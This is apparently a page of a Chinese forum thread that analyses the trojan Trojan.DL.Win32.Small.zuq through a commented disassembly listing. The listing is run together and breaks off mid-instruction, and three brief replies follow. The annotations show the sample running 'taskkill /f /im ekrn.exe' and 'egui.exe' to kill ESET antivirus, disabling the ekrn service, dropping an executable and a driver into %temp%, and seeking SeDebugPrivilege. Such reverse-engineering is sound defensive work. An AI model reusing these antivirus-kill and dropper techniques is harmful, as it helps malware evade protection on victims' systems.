首页| 论坛| 搜索| 消息
>〖系统安全〗
主题:Trojan.DL.Win32.Small.zuq简单分析
z3960发表于 2023-05-18 07:24
word ptr 00404051A5movsdword ptr es:, dword ptr 00404052A5movsdword ptr es:, dword ptr 00404053A5movsdword ptr es:, dword ptr 004040548D45 DC lea eax, dword ptr 0040405750pusheax00404058A5movsdword ptr es:, dword ptr 00404059E8 E1FBFFFF call00403C3F0012FF14 0012FF44; 解密字符串"/f /im ekrn.exe"0040405EBE B4344000 mov esi, 004034B4004040638D7D CC lea edi, dword ptr 00404066A5movsdword ptr es:, dword ptr 00404067A5movsdword ptr es:, dword ptr 00404068A5movsdword ptr es:, dword ptr 004040698D45 CC lea eax, dword ptr 0040406C50pusheax0040406DA5movsdword ptr es:, dword ptr 0040406EE8 CCFBFFFF call00403C3F ; 解密字符串"/f /im egui.exe"004040738B35 B4104000 mov esi, dword ptr [4010B4]; kernel32.GetCurrentThreadId0040407983C4 18 add esp, 180040407CFFD6callesi0040407E33DBxor ebx, ebx004040808B3D F0104000 mov edi, dword ptr [4010F0] 0040408653pushebx004040878D45 DC lea eax, dword ptr 0040408A53pushebx0040408B50pusheax0040408C8D45 EC lea eax, dword ptr 0040408F50pusheax0040409053pushebx0040409153pushebx00404092FFD7calledi; ShellExecuteA运行taskkill.exe,执行“taskkill.exe /f /im ekrn.exe”0040409468 D0070000 push7D000404099FF15 A8104000 calldword ptr [4010A8] ; 暂停2秒0040409FFFD6callesi004040A153pushebx004040A28D45 CC lea eax, dword ptr 004040A553pushebx004040A650pusheax004040A78D45 EC lea eax, dword ptr 004040AA50pusheax004040AB53pushebx004040AC53pushebx004040ADFFD7calledi ; ShellExecuteA运行taskkill.exe,执行“taskkill.exe /f /im egui.exe”禁止ekrn服务部分代码00404030E8 7CFFFFFF call00403FB1进入call代码00403FB155pushebp00403FB28BECmov ebp, esp00403FB451pushecx00403FB556pushesi00403FB633F6xor esi, esi00403FB868 3F000F00 push0F003F00403FBD56pushesi00403FBE56pushesi00403FBFFF15 34104000 calldword ptr [401034] ; 打开服务管理器00403FC53BC6cmp eax, esi00403FC78945 FC mov dword ptr , eax00403FCA74 3F jeshort 0040400B00403FCC53pushebx00403FCD57pushedi00403FCE68 FF010F00 push0F01FF00403FD3FF75 08 pushdword ptr 00403FD650pusheax00403FD7FF15 04104000 calldword ptr [401004] ; 打开ekrn服务00403FDD8B3D 08104000 mov edi, dword ptr [401008]; ADVAPI32.CloseServiceHandle00403FE38BD8mov ebx, eax00403FE53BDEcmp ebx, esi00403FE774 1B jeshort 00404004 ; 如果不存在该服务跳0040400400403FE956pushesi00403FEA56pushesi00403FEB56pushesi00403FEC56pushesi00403FED56pushesi00403FEE56pushesi00403FEF56pushesi00403FF06A FF push-100403FF2FF75 0C pushdword ptr 00403FF568 10010000 push11000403FFA53pushebx00403FFBFF15 2C104000 calldword ptr [40102C] ; 若存在该服务顺序走到这,通过ChangeServiceConfigA修改服务启动方式,禁止ekrn服务复制代码6.临时文件夹创建文件
004038E955pushebp004038EA8BECmov ebp, esp004038EC83EC 70 sub esp, 70004038EF53pushebx004038F056pushesi004038F157pushedi004038F2BE 14344000 mov esi, 00403414004038F78D7D F4 lea edi, dword ptr 004038FA8D45 F4 lea eax, dword ptr 004038FDA5movsdword ptr es:, dword ptr 004038FEA5movsdword ptr es:, dword ptr 004038FF50pusheax0040390066:A5 movsword ptr es:, word ptr 00403902E8 38030000 call00403C3F ; 解密字符串“%s~%x.tmp”0040390759pop ecx; 0012FF5C004039088D45 90 lea eax, dword ptr 0040390B50pusheax0040390C6A 64 push640040390EFF15 58104000 calldword ptr [401058] ; 获取临时文件夹目录%temp%004039148B3D 54104000 mov edi, dword ptr [401054] 0040391AFFD7calledi; 获取系统开机时间数得到一组随机数字0040391C83C0 16 add eax, 160040391F8B1D FC104000 mov ebx, dword ptr [4010FC]; USER32.wsprintfA0040392550pusheax004039268D45 90 lea eax, dword ptr 0040392950pusheax0040392A8D45 F4 lea eax, dword ptr 0040392DBE CC454000 mov esi, 004045CC0040393250pusheax0040393356pushesi00403934FFD3callebx; 将得到的数字字符输入缓冲区得到映像路径"%temp%\~74e66a.tmp"0040393656pushesi0040393768 10344000 push00403410 ; ASCII "ico"0040393C68 0C344000 push0040340C00403941E8 6AFEFFFF call004037B00040394683C4 1C add esp, 1C0040394985C0testeax, eax0040394B74 16 jeshort 004039630040394D68 08344000 push00403408 ; ASCII "xx"00403952FF15 C4104000 calldword ptr [4010C4] ; kernel32.DeleteFileA0040395885C0testeax, eax0040395A75 07 jnz short 004039630040395C56pushesi0040395DE8 3EFFFFFF call004038A0 ; 创建文件%temp%\~74e66a.tmp(一个exe的可执行文件)进入call代码004038AC6A 01 push1004038AE68 000000C0 pushC0000000004038B3FF75 08 pushdword ptr 004038B6FF15 B0104000 calldword ptr [4010B0] ; 创建文件004038BC56pushesi004038BD8BF8mov edi, eax004038BF56pushesi004038C06A 01 push1004038C257pushedi004038C3FF15 50104000 calldword ptr [401050] ; 设置文件指针004038C98D45 08 lea eax, dword ptr 004038CC56pushesi004038CD50pusheax004038CE6A 01 push1004038D068 00344000 push00403400004038D557pushedi004038D6FF15 70104000 calldword ptr [401070] ; 写入文件0040396259pop ecx00403963FFD7calledi; 获取系统开机时间数0040396583C0 15 add eax, 1500403968BE AC444000 mov esi, 004044AC0040396D50pusheax0040396E8D45 90 lea eax, dword ptr 0040397150pusheax004039728D45 F4 lea eax, dword ptr 0040397550pusheax0040397656pushesi00403977FFD3callebx; 得到路径"%temp%\~74e66a.tmp"0040397956pushesi0040397A68 10344000 push00403410 ; ASCII "ico"0040397F68 04344000 push0040340400403984E8 27FEFFFF call004037B0 ; 创建文件%temp%\~74e66a.tmp,查找自身资源“ico”中名为“D”的资源写入文件(一个驱动文件)复制代码7.运行~7c963f.tmp
004036DA57pushedi004036DB50pusheax004036DCE8 5E050000 call00403C3F ; 解密字符串"\\.\ao1"004036E18D85 F0FEFFFF lea eax, dword ptr 004036E7C70424 04010000 mov dword ptr , 104004036EE33FFxor edi, edi004036F050pusheax004036F157pushedi004036F2FF15 A4104000 calldword ptr [4010A4] ; kernel32.GetModuleFileNameA004036F868 A8DE0000 push0DEA8004036FDFF15 A8104000 calldword ptr [4010A8] ; 暂停57秒004037036A 05 push50040370568 AC444000 push004044AC0040370AFF15 AC104000 calldword ptr [4010AC] ; 运行~7c963f.tmp复制代码8.提权
00403710E8 4BFEFFFF call00403560 ; 为进程提升SeDebugPrivilege权限进入call代码0040356055pushebp004035618BECmov ebp, esp0040356383EC 14 sub esp, 1400403566FF15 D4104000 calldword ptr [4010D4] ; kernel32.GetCurrentProcess0040356C8D4D FC lea ecx, dword ptr 0040356F51pushecx0040357
下一页上一页  (3/13)
回帖(3):
3 # 任逍遥
05-19 06:19
不错,了解了
2 # 任逍遥
05-19 06:19
来看一下
1 # 爱我中华
05-18 15:13
长知识了

全部回帖(3)»
最新回帖
收藏本帖
发新帖